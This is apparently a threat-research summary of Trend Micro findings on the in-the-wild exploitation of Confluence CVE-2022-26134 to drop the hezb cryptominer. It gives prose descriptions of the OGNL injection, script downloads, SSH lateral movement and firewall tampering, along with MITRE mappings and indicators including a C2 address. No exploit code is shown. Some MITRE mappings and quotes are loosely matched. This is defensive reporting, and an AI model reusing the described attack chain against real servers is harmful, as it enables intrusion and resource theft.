Threat Research

Atlassian Confluence Vulnerability CVE-2022-26134 Abused For Cryptocurrency Mining, Other Malware

Securonix

Trend Micro’s analysis shows active exploitation of CVE-2022-26134 in Atlassian Confluence servers for cryptocurrency mining and other malware. The attacker uses an OGNL payload to trigger remote code execution, downloads ro.sh and ap.sh scripts, and ultimately drops the hezb miner while attempting lateral movement and firewall modifications. #CVE-2022-26134 #AtlassianConfluence #hezb #Kinsing #DarkIoT #Mirai #ChinaChopper

Keypoints

  • The vulnerability CVE-2022-26134 is an unauthenticated remote code execution in Atlassian Confluence with a critical rating, and exploitation is observed in the wild for malicious cryptocurrency mining.
  • Attackers deliver an OGNL expression via a crafted HTTP request to trigger RCE and verify exploitation by issuing an id command, with the response exposed in the X-Cmd-Response header.
  • Infection chains show the use of shell scripts (ro.sh and ap.sh) downloaded from the C2 and a downloader binary (ko) to establish persistence and execute malware.
  • The malware infrastructure includes a C2 server at 106.252.252.226:4545 and a web reputation/antimalware-enabled defense layer that blocks malicious activity and monitors telemetry.
  • Observed malware families include hezb, with references to Kinsing and Dark.IoT, and notes that other miners like Mirai and China Chopper have been observed in related campaigns.
  • The activities cover discovery (SSH users/keys/hosts), lateral movement via SSH, privilege escalation (PwnKit), and attempts to disable defenses (firewall changes, IPTables actions).

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The article describes active exploitation of CVE-2022-26134 in Confluence. Quote: “We observed the active exploitation of CVE-2022-26134, an unauthenticated remote code execution (RCE) vulnerability with a critical rating of 9.8 in the collaboration tool Atlassian Confluence.”
  • [T1574.007] Hijack Execution Flow: Path Interception by PATH Environment Variable – The attacker injected an OGNL expression to download and run the ro.sh script in the victim’s machine. Quote: “…injected an OGNL expression to download and run the ro.sh script in the victim’s machine.”
  • [T1222.002] File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification – The malware is capable of changing the attribute of /etc/ld.so.preload to make it mutable. Quote: “the script capable of changing the attribute of /etc/ld.so.preload to make it mutable.”
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – The activity includes hiding artifacts as part of the attack surface. Quote: “Hide Artifacts: Hidden Files and Directories.”
  • [T1518] Software Discovery – The malware performs discovery to identify software-related state. Quote: “Software Discovery” (as part of the listed techniques).
  • [T1562.004] Impair Defenses: Disable or Modify System Firewall – It disables iptables or changes firewall policy to ACCEPT and flushes firewall rules. Quote: “Like many other cryptocurrency-mining malware, it disables the iptables or changes the firewall policy action to ACCEPT and flushes all the firewall rules.”
  • [T1070.004] Indicator Removal on Host: File Deletion – (Referenced in the MITRE mapping; described as part of stealthy behavior in the malware set.) Quote: “Indicator Removal on Host: File Deletion.”
  • [T1053.003] Scheduled Task/Job: Cron – The mapping includes Cron as a technique for persistence. Quote: “Cron.”
  • [T1496] Resource Hijacking – The core objective is cryptocurrency mining. Quote: “for malicious cryptocurrency mining.”
  • [T1082] System Information Discovery – The malware gathers host information to facilitate operation. Quote: “The script checks for the presence of hezb in the running process… and scans for SSH users, keys, and hosts…”
  • [T1018] Remote System Discovery – The malware discovers remote system attributes (SSH-related data) to enable movement. Quote: “Under the /root and /home directories, the script scans for secure shell protocol (SSH) users, keys, and hosts in the .ssh directory and .bash_history file.”
  • [T1021.004] Remote Services: SSH – Lateral movement via SSH is used to run additional scripts on remote hosts. Quote: “During lateral movement via SSH, the malware also downloads the ldr.sh script on the remote hosts.”

Indicators of Compromise

  • [IP] 106.252.252.226:4545 – C2 server used by the malware to fetch scripts and communicate payloads.
  • [File] ro.sh, ap.sh – Shell scripts downloaded and executed as part of the infection chain.
  • [File] ldr.sh – Script downloaded during lateral movement to carry out further actions.
  • [File] ko – Binary file downloaded as part of the payload (hezb) delivery.

Read more: https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html